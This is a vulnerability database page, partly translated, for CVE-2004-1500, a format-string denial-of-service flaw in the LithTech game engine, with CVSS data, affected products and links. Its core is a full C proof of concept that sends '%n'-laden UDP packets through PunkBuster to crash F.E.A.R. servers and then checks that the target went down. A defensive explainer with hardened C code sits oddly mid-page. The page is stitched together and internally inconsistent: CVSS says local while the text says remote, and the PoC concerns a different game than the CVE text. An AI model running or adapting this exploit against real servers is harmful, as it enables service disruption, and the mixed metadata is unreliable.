CVE-2004-1500
CVSS2.1
Published: 2004-12-31 00:00:00
Revised: 2016-10-17 22:55:14
NMCOES    

[Original] Format string vulnerability in the Lithtech engine, as used in multiple games, allows remote authenticated users to cause a denial of service (application crash) via format string specifiers in (1) a nickname or (2) a message.


[CNNVD] LithTech Engine Format String Remote Denial of Service Vulnerability (CNNVD-200412-839)

        
LithTech Engine is a game engine used in multiple games.
LithTech Engine does not handle external input correctly when processing nicknames and other information; a remote attacker can exploit this vulnerability to mount a denial-of-service attack against the server program.
Sending data containing format-string characters (such as '%n%n%n') as a nickname or other information triggers the format-string issue, causing the server program to crash because of writes to arbitrary memory addresses.
        

- CVSS (base score)

CVSS score: 2.1 [LOW]
Confidentiality impact: NONE [no impact on system confidentiality]
Integrity impact: NONE [no impact on system integrity]
Availability impact: PARTIAL [may cause reduced performance or interruption of resource access]
Access complexity: LOW [no access restrictions on exploitation]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

cpe:/a:monolith_productions:global_operations:2.0
cpe:/a:monolith_productions:shogo:2.2
cpe:/a:monolith_productions:tron:2.0.1.42
cpe:/a:monolith_productions:kiss_psycho_circus:1.13
cpe:/a:monolith_productions:alien_versus_predator:2.1.0.9.6
cpe:/a:monolith_productions:no_one_lives_forever:2.1.3
cpe:/a:monolith_productions:blood:2.2.1
cpe:/a:monolith_productions:contract_jack:1.1
cpe:/a:monolith_productions:legends_of_might_and_magic:1.1
cpe:/a:freeform_interactive:purge_jihad:2.2.1
cpe:/a:monolith_productions:no_one_lives_forever:1.0.004
cpe:/a:monolith_productions:sanity:1.0
cpe:/a:monolith_productions:global_operations:2.1

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1500
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1500
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-839
(Official data source) CNNVD

- Other links and resources

http://aluigi.altervista.org/adv/lithfs-adv.txt
(UNKNOWN)  MISC  http://aluigi.altervista.org/adv/lithfs-adv.txt
http://marc.info/?l=bugtraq&m=109969394601331&w=2
(UNKNOWN)  BUGTRAQ  20041105 In-game format string bug in the Lithtech engine
http://www.securityfocus.com/bid/11610
(UNKNOWN)  BID  11610
http://xforce.iss.net/xforce/xfdb/17972
(PATCH)  XF  lithtech-format-string(17972)

- Vulnerability information

LithTech Engine Format String Remote Denial of Service Vulnerability
Low severity  Input validation
2004-12-31 00:00:00 2006-09-25 00:00:00
Remote
        
LithTech Engine is a game engine used in multiple games.
LithTech Engine does not handle external input correctly when processing nicknames and other information; a remote attacker can exploit this vulnerability to mount a denial-of-service attack against the server program.
Sending data containing format-string characters (such as '%n%n%n') as a nickname or other information triggers the format-string issue, causing the server program to crash because of writes to arbitrary memory addresses.
        

- Advisories and patches

Vendor patches:
Lithtech
--------
The vendor has not yet released a patch or upgrade. Users of this software are advised to follow the vendor's homepage for the latest version:

http://www.lithtech.com/

- Vulnerability information (24724)

Monolith Lithtech Game Engine Multiple Remote Format String Vulnerabilities (EDBID:24724)
multiple remote
2004-11-05 Verified
0 Luigi Auriemma
N/A
source: http://www.securityfocus.com/bid/11610/info

Lithtech game engine is prone to multiple remote format-string vulnerabilities because of incorrect usage of 'printf()'-type functions. Format specifiers can be supplied directly to vulnerable functions from external data. 

A denial-of-service condition arises when a vulnerable server handles a malformed request. 

Exploiting these issues may also allow an attacker to write to arbitrary process memory and potentially execute code. Any code executed through this vulnerability could potentially run with the privileges of the server.

/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <stdarg.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
    #define ONESEC  1000
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define ONESEC  1
    #define stristr strcasestr
    #define stricmp strcasecmp  /* stricmp() exists only on Windows; map it to the POSIX name */
#endif

typedef uint8_t     u8;
typedef uint16_t    u16;
typedef uint32_t    u32;



#define VER         "0.1"
#define PORT        27888
/* GameSpy 2 status query, used only to check whether the server still answers */
#define GS2_QUERY   "\xfe\xfd\x00" "\x00\x00\x00\x00" "\xff\x00\x00" \
                    "\x00"
#define FSTRING     "%n%s%n%s%n%s%n%s%n%s%n%s"
#define FEARFSPB1   "\xff\xff\xff\xff" "PB_Y" FSTRING
#define FEARFSPB2   "\xff\xff\xff\xff" "PB_U" "\xff\xff\xff\xff" \
                    "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0" \
                    "127.0.0.1:1234;" FSTRING ";"




int gs_handle_info(u8 *data, int datalen, int nt, int chr, int front, int rear, ...);
int send_recv(int sd, u8 *in, int insz, u8 *out, int outsz, struct sockaddr_in *peer, int err);
int timeout(int sock, int secs);
u32 resolv(char *host);
void std_err(void);



int main(int argc, char *argv[]) {
    struct  sockaddr_in peer;
    int     sd,
            len,
            noquery = 0;
    u16     port    = PORT;
    u8      buff[8192];

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    setbuf(stdout, NULL);

    fputs("\n"
        "F.E.A.R. <= 1.08 format string exploitation through Punkbuster "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 2) {
        printf("\n"
            "Usage: %s <host> [port(%hu)]\n"
            "\n", argv[0], port);
        exit(1);
    }

    if(argc > 2) port = atoi(argv[2]);
    peer.sin_addr.s_addr = resolv(argv[1]);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    printf("- target   %s : %hu\n",
        inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));

    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();

    printf("- query server:\n");
    len = send_recv(sd, GS2_QUERY, sizeof(GS2_QUERY) - 1, buff, sizeof(buff), &peer, 0);
    if(len < 0) {
        printf("- no reply received, I try to continue\n");
        noquery = 1;
    } else {
        gs_handle_info(buff, len, 0, '\0',  5, 0, NULL);
    }

    sleep(ONESEC);
    printf("- send malformed packets\n");
    len = send_recv(sd, FEARFSPB1, sizeof(FEARFSPB1) - 1, NULL, 0, &peer, 1);
    len = send_recv(sd, FEARFSPB2, sizeof(FEARFSPB2) - 1, NULL, 0, &peer, 1);

    if(noquery) {
        printf("- the server should have been crashed, check it manually\n");
    } else {
        printf("- wait some seconds\n");
        sleep(ONESEC * 3);

        printf("- check server:\n");
        len = send_recv(sd, GS2_QUERY, sizeof(GS2_QUERY) - 1, buff, sizeof(buff), &peer, 0);
        if(len < 0) {
            printf("\n  Server IS vulnerable!!!\n");
        } else {
            printf("\n  Server doesn't seem vulnerable\n");
        }
    }

    close(sd);
    return(0);
}



int gs_handle_info(u8 *data, int datalen, int nt, int chr, int front, int rear, ...) {
    va_list ap;
    int     i,
            args,
            found;
    u8      **parz,
            ***valz,
            *p,
            *limit,
            *par,
            *val;

    va_start(ap, rear);
    for(i = 0; ; i++) {
        if(!va_arg(ap, u8 *))  break;
        if(!va_arg(ap, u8 **)) break;
    }
    va_end(ap);

    args = i;
    parz = malloc(args * sizeof(u8 *));
    valz = malloc(args * sizeof(u8 **));

    va_start(ap, rear);
    for(i = 0; i < args; i++) {
        parz[i]  = va_arg(ap, u8 *);
        valz[i]  = va_arg(ap, u8 **);
        *valz[i] = NULL;
    }
    va_end(ap);

    found  = 0;
    limit  = data + datalen - rear;
    *limit = 0;
    data   += front;
    par    = NULL;
    val    = NULL;

    for(p = data; (data < limit) && p; data = p + 1, nt++) {
        p = strchr(data, chr);
        if(p) *p = 0;

        if(nt & 1) {
            if(!par) continue;
            val = data;
            printf("  %30s %s\n", par, val);

            for(i = 0; i < args; i++) {
                if(!stricmp(par, parz[i])) *valz[i] = val;
            }
        } else {
            par = data;
        }
    }

    free(parz);
    free(valz);
    return(found);
}



int send_recv(int sd, u8 *in, int insz, u8 *out, int outsz, struct sockaddr_in *peer, int err) {
    int     retry,
            len;

    if(in && !out) {
        if(sendto(sd, in, insz, 0, (struct sockaddr *)peer, sizeof(struct sockaddr_in))
          < 0) std_err();
        return(0);
    }
    if(in) {
        for(retry = 2; retry; retry--) {
            if(sendto(sd, in, insz, 0, (struct sockaddr *)peer, sizeof(struct sockaddr_in))
              < 0) std_err();
            if(!timeout(sd, 1)) break;
        }

        if(!retry) {
            if(!err) return(-1);
            printf("\nError: socket timeout, no reply received\n\n");
            exit(1);
        }
    } else {
        if(timeout(sd, 3) < 0) return(-1);
    }

    len = recvfrom(sd, out, outsz, 0, NULL, NULL);
    if(len < 0) std_err();
    return(len);
}



int timeout(int sock, int secs) {
    struct  timeval tout;
    fd_set  fd_read;

    tout.tv_sec  = secs;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    if(select(sock + 1, &fd_read, NULL, NULL, &tout)
      <= 0) return(-1);
    return(0);
}



u32 resolv(char *host) {
    struct  hostent *hp;
    u32     host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u32 *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


		

- Vulnerability information

11511
Lithtech Engine Multiple Game nickname Format String
Local / Remote, Context Dependent Input Manipulation
Loss of Integrity

- Vulnerability description

Unknown or Incomplete

- Timeline

2004-11-04 Unknown
2004-11-04 Unknown

- Solution

Unknown or Incomplete

- References

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

Monolith Lithtech Game Engine Multiple Remote Format String Vulnerabilities
Input Validation Error 11610
Yes No
2004-11-05 12:00:00 2007-10-01 10:59:00
Discovery of these issues is credited to Luigi Auriemma <aluigi@autistici.org>.

- Affected program versions

Monolith Productions Tron 2.0 1.42
Monolith Productions Shogo 2.2
Monolith Productions Sanity 1.0
Monolith Productions Purge Jihad 2.2.1
Monolith Productions No One Lives Forever 2 1.3
Monolith Productions No One Lives Forever 1.0 .004
Monolith Productions Legends of Might and Magic 1.1
Monolith Productions Kiss Psycho Circus 1.13
Monolith Productions Global Operations 2.1
Monolith Productions Global Operations 2.0
Monolith Productions F.E.A.R. 1.0 2
Monolith Productions F.E.A.R. 1.0 1
Monolith Productions F.E.A.R. 1.08
Monolith Productions Contract Jack 1.1
Monolith Productions Blood 2 2.1
Monolith Productions Alien versus Predator 2 1.0.9 .6
Monolith Productions Purge Jihad 2.2.2

- Unaffected program versions

Monolith Productions Purge Jihad 2.2.2

- Vulnerability discussion

Lithtech game engine is prone to multiple remote format-string vulnerabilities because of incorrect usage of 'printf()'-type functions. Format specifiers can be supplied directly to vulnerable functions from external data.

A denial-of-service condition arises when a vulnerable server handles a malformed request.

Exploiting these issues may also allow an attacker to write to arbitrary process memory and potentially execute code. Any code executed through this vulnerability could potentially run with the privileges of the server.
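The defect class described above (here and in the earlier BID text): a printf()-type function whose format argument is player-controlled. The following is an added example, not code from the advisory, from Monolith or from the LithTech engine. It shows the vulnerable call pattern next to a hardened version that keeps the format string constant, plus a detector a server could use to log or rate-limit probes. Function names and the buffer size are assumptions; the sample inputs are constructed, with "%n%n%n" taken from the description above.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Added example (not the advisory's or the engine's code). Names and the
 * buffer size are assumptions made for illustration. */

/* VULNERABLE pattern, shown as a comment because its behaviour is undefined
 * and gcc with -Werror=format-security refuses to compile it:
 *
 *     void broadcast_unsafe(const char *player_text) {
 *         printf(player_text);        // attacker data used as the format
 *     }
 *
 * A nickname such as "%n%n%n" is parsed as conversion directives; each "%n"
 * writes an int through whatever pointer printf pulls from the stack, which
 * is the crash the advisory reports. */

/* HARDENED pattern: the format string is a compile-time constant and the
 * untrusted text only ever flows through "%s", so a '%' in it is printed
 * literally. snprintf() bounds the write and returns the length the full
 * line would have needed, which lets the caller detect truncation. */
int format_chat_line(char *out, size_t outsz, const char *nick, const char *msg) {
    return snprintf(out, outsz, "<%s> %s", nick, msg);
}

/* Detection signal: does the text contain anything printf would interpret?
 * "%%" is the escape for a literal percent sign and is allowed; any other
 * '%' (including a trailing one, which is a malformed directive) is flagged.
 * This is telemetry for the server log or anti-abuse logic, not the fix:
 * the constant format above is what actually closes the hole. */
bool contains_format_directive(const char *s) {
    for (const char *p = s; *p; p++) {
        if (*p != '%') continue;
        if (p[1] == '%') { p++; continue; }   /* literal "%%" */
        return true;
    }
    return false;
}

/* Simulated server-side chat handler. It always builds the line safely.
 * Returns 1 when the input looked like a format-string probe (so the caller
 * can log or kick), 0 for ordinary input, -1 when the line was truncated. */
int handle_chat(char *out, size_t outsz, const char *nick, const char *msg) {
    bool suspicious = contains_format_directive(nick) ||
                      contains_format_directive(msg);
    int n = format_chat_line(out, outsz, nick, msg);
    if (n < 0 || (size_t)n >= outsz) return -1;
    return suspicious ? 1 : 0;
}

int main(void) {
    char line[256];
    /* Constructed sample inputs; "%n%n%n" is the value quoted in the advisory. */
    int rc = handle_chat(line, sizeof line, "%n%n%n", "hello");
    printf("rc=%d line=%s\n", rc, line);       /* rc=1 line=<%n%n%n> hello */
    rc = handle_chat(line, sizeof line, "player1", "hello");
    printf("rc=%d line=%s\n", rc, line);       /* rc=0 line=<player1> hello */
    return 0;
}
```

The same constant-format rule applies to every printf-family call that touches network input (fprintf to a log, sprintf into a buffer, syslog, and any engine-specific logging wrapper that forwards a format string), since the advisory attributes the bug to "printf()-type functions" in general rather than to one call site.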

- Exploit

The following proof-of-concept exploit is available:

- Solution

Reportedly, Purge Jihad 2.2.2 addresses this vulnerability. Please contact the vendor for more information.

- References

 

 
